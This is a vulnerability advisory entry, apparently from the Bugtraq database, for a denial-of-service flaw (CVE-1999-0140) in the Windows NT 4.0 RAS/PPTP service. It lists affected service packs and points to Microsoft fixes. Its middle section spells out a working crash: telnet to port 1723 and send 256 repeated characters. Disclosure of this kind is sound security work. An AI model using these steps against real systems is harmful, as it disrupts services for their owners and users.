Microsoft NT RAS/PPTP Malformed Control Packet Denial of Service Attack

Bugtraq ID:	2111
Class:	Failure to Handle Exceptional Conditions
CVE:	CVE-1999-0140
Remote:	Yes
Local:	Yes
Published:	Apr 27 1999 12:00AM
Updated:	Jul 11 2009 04:46AM
Credit:	Posted to BugTraq on April 27, 1999 by Simon Helson <[email protected]>
Vulnerable:	Microsoft Windows NT Terminal Server 4.0 Microsoft Windows NT 4.0 SP4 + Microsoft Windows NT Enterprise Server 4.0 SP4 + Microsoft Windows NT Enterprise Server 4.0 SP4 + Microsoft Windows NT Server 4.0 SP4 + Microsoft Windows NT Server 4.0 SP4 + Microsoft Windows NT Terminal Server 4.0 SP4 + Microsoft Windows NT Terminal Server 4.0 SP4 + Microsoft Windows NT Workstation 4.0 SP4 + Microsoft Windows NT Workstation 4.0 SP4 Microsoft Windows NT 4.0 SP3 + Microsoft Windows NT Enterprise Server 4.0 SP3 + Microsoft Windows NT Enterprise Server 4.0 SP3 + Microsoft Windows NT Server 4.0 SP3 + Microsoft Windows NT Server 4.0 SP3 + Microsoft Windows NT Terminal Server 4.0 SP3 + Microsoft Windows NT Terminal Server 4.0 SP3 + Microsoft Windows NT Workstation 4.0 SP3 + Microsoft Windows NT Workstation 4.0 SP3 Microsoft Windows NT 4.0 SP2 + Microsoft Windows NT Enterprise Server 4.0 SP2 + Microsoft Windows NT Enterprise Server 4.0 SP2 + Microsoft Windows NT Server 4.0 SP2 + Microsoft Windows NT Server 4.0 SP2 + Microsoft Windows NT Terminal Server 4.0 SP2 + Microsoft Windows NT Terminal Server 4.0 SP2 + Microsoft Windows NT Workstation 4.0 SP2 + Microsoft Windows NT Workstation 4.0 SP2 Microsoft Windows NT 4.0 SP1 + Microsoft Windows NT Enterprise Server 4.0 SP1 + Microsoft Windows NT Enterprise Server 4.0 SP1 + Microsoft Windows NT Server 4.0 SP1 + Microsoft Windows NT Server 4.0 SP1 + Microsoft Windows NT Terminal Server 4.0 SP1 + Microsoft Windows NT Terminal Server 4.0 SP1 + Microsoft Windows NT Workstation 4.0 SP1 + Microsoft Windows NT Workstation 4.0 SP1 Microsoft Windows NT 4.0 + Microsoft Windows NT Enterprise Server 4.0 + Microsoft Windows NT Enterprise Server 4.0 + Microsoft Windows NT Server 4.0 + Microsoft Windows NT Server 4.0 + Microsoft Windows NT Terminal Server 4.0 + Microsoft Windows NT Terminal Server 4.0 + Microsoft Windows NT Workstation 4.0 + Microsoft Windows NT Workstation 4.0
Not Vulnerable:	Microsoft Windows NT 4.0 SP6 + Microsoft Windows NT Enterprise Server 4.0 SP6 + Microsoft Windows NT Enterprise Server 4.0 SP6 + Microsoft Windows NT Server 4.0 SP6 + Microsoft Windows NT Server 4.0 SP6 + Microsoft Windows NT Terminal Server 4.0 SP6 + Microsoft Windows NT Terminal Server 4.0 SP6 + Microsoft Windows NT Workstation 4.0 SP6 + Microsoft Windows NT Workstation 4.0 SP6 Microsoft Windows NT 4.0 SP5 + Microsoft Windows NT Enterprise Server 4.0 SP5 + Microsoft Windows NT Enterprise Server 4.0 SP5 + Microsoft Windows NT Server 4.0 SP5 + Microsoft Windows NT Server 4.0 SP5 + Microsoft Windows NT Terminal Server 4.0 SP5 + Microsoft Windows NT Terminal Server 4.0 SP5 + Microsoft Windows NT Workstation 4.0 SP5 + Microsoft Windows NT Workstation 4.0 SP5

Microsoft NT RAS/PPTP Malformed Control Packet Denial of Service Attack

1) telnet targetmachine 1723
2) hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhh (256 characters)
3) ctrl-d

Microsoft NT RAS/PPTP Malformed Control Packet Denial of Service Attack

References:

• Point-to-Point Tunneling Protocol (PPTP) FAQ (Microsoft)
  
• Q152734 - How to Obtain the Latest Windows NT 4.0 Service Pack (Microsoft)
  
• Q179107 - STOP 0x0000000A in Raspptpe.sys on a Windows NT PPTP Server (Microsoft)